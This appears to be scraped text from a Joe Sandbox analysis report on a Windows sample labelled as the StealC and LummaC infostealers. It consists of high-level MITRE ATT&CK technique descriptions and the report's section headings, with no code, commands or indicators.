Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
file.exe

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre